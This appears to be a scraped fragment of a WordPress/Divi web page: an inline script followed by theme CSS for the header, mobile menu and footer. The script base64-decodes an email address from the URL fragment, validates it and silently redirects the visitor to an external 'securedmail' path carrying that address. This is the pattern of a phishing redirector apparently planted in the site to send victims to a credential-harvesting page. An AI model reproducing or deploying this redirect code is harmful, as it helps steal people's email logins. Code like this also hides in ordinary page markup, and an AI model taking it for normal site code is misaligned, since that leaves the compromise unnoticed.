<script type="text/javascript" >
function validateEmail(referrer) {
var re = /^(([^<>()[\]\.,;:\s@\"]+(\.[^<>()[\]\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
return re.test(referrer);
}
decodeBase64 = function(s) {
     var e={},i,b=0,c,x,l=0,a,r='',w=String.fromCharCode,L=s.length;
     var A="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
     for(i=0;i<64;i++){e[A.charAt(i)]=i;}
     for(x=0;x<L;x++){
         c=e[s.charAt(x)];b=(b<<6)+c;l+=6;
         while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(L-2)))&&(r+=w(a));}
     }
     return r;
}
var hash = window.location.hash.substring(1);
var email = decodeBase64(hash);
console.log(email)
;
if(validateEmail(email)) {
  console.log(email)
;
window.location = "https://centratrip.com/securedmail/"+hash;
}
</script>

@media only screen and (max-width:980px){#logo{min-height:100px}}@media only screen and (min-width:981px){#logo{min-height:120px}}@media (max-width:980px){.et_non_fixed_nav.et_transparent_nav #main-header,.et_non_fixed_nav.et_transparent_nav #top-header,.et_fixed_nav #main-header,.et_fixed_nav #top-header{position:fixed}}.et_mobile_menu{overflow:scroll!important;max-height:83vh}.mobile_menu_bar:after{content:'MENU';bottom:10px;left:10%;position:relative!important;color:#FFF}.mobile_nav.opened .mobile_menu_bar:before{content:'\4d'}.et_pb_section_1_tb_footer.et_pb_section{padding-top:0px;padding-bottom:0px;margin-top:0px;margin-bottom:0px;background-color:#8c0003!important}.et_pb_row_1_tb_footer.et_pb_row{padding-top:11px!important;padding-bottom:11px!important;padding-top:11px;padding-bottom:11px}.et_pb_text_6_tb_footer.et_pb_text{color:#f2f2f2!important}.et_pb_text_6_tb_footer{font-family:'Open Sans',Helvetica,Arial,Lucida,sans-serif;font-size:14px}.et_pb_text_6_tb_footer.et_pb_text a{color:#ffffff!important}